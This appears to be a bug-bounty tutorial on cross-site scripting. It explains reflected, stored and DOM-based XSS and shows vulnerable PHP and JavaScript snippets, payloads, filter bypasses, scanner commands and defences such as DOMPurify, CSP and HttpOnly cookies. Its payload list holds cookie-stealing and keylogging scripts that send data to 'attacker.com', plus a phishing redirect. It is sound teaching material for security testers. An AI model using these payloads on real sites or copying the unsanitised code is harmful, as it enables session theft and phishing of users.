XSS (Cross-Site Scripting) — Complete Attack & Defense Guide

Cross-Site Scripting (XSS) Explained

XSS allows attackers to inject malicious JavaScript into web pages viewed by other users. It is consistently in the OWASP Top 10 and one of the most common bug bounty findings.

When successful, XSS lets an attacker: steal session cookies, redirect users to phishing pages, log keystrokes, take screenshots, and perform actions as the victim.

Types of XSS

1. Reflected XSS — Not Stored in Database

The malicious script comes from the current HTTP request and is reflected back to the user.

Vulnerable URL:
https://example.com/search?q=hello

Injected URL:
https://example.com/search?q=<script>alert('XSS')</script>

Vulnerable code:
echo "You searched for: " . $_GET['q'];  // No sanitization!

2. Stored XSS — Persists in Database

The script is stored in the application and served to every user who views the affected page. This is the most dangerous type.

Attack: Submit this in a comment box:
<script>
  fetch('https://attacker.com/steal?cookie=' + document.cookie);
</script>

Every visitor to the page now sends their session cookie to the attacker.

3. DOM-Based XSS — Client-Side Only

Vulnerable JavaScript:
document.getElementById('output').innerHTML = location.hash.slice(1);

Attack URL:
https://example.com/#<img src=x onerror=alert('XSS')>

No server involved — browser executes the payload directly.

XSS Payloads — From Basic to Advanced

<!-- Basic alert (proof of concept) -->
<script>alert('XSS')</script>
<img src=x onerror=alert('XSS')>
<svg onload=alert('XSS')>
<body onload=alert('XSS')>

<!-- Cookie stealer -->
<script>document.location='https://attacker.com/?c='+document.cookie</script>

<!-- Keylogger -->
<script>
document.onkeypress = function(e) {
  fetch('https://attacker.com/keys?k=' + e.key);
}
</script>

<!-- Phishing redirect -->
<script>window.location='https://evil-site.com/fake-login'</script>

Filter Bypass Techniques

<!-- When <script> is filtered -->
<ScRiPt>alert('XSS')</ScRiPt>
<img src=x onerror=alert('XSS')>
<svg/onload=alert('XSS')>

<!-- When quotes are filtered -->
<img src=x onerror=alert(String.fromCharCode(88,83,83))>

<!-- HTML encoding bypass -->
&lt;script&gt;alert('XSS')&lt;/script&gt;

<!-- JavaScript URL -->
<a href="javascript:alert('XSS')">Click me</a>

Finding XSS in Bug Bounty

# Manual testing checklist:
1. Every input field: name, email, comment, search
2. URL parameters: ?q=, ?page=, ?id=, ?redirect=
3. HTTP headers: User-Agent, Referer, X-Forwarded-For
4. JSON API parameters
5. File upload names (SVG files can contain XSS)

# Automated testing with tools:
# XSStrike - intelligent XSS scanner
python3 xsstrike.py -u "https://target.com/search?q=test"

# Dalfox - fast XSS scanner
dalfox url "https://target.com/search?q=test"

Prevention — How to Prevent XSS

// 1. Never use innerHTML with user input
// BAD:
element.innerHTML = userInput;

// GOOD:
element.textContent = userInput;

// 2. DOMPurify for rendering HTML
import DOMPurify from 'dompurify';
element.innerHTML = DOMPurify.sanitize(userInput);

// 3. Content Security Policy header
Content-Security-Policy: default-src 'self'; script-src 'self'

// 4. HttpOnly cookies (prevent cookie theft via XSS)
Set-Cookie: session=abc123; HttpOnly; Secure; SameSite=Strict

🔥 Learn to find XSS in real bug bounty programs →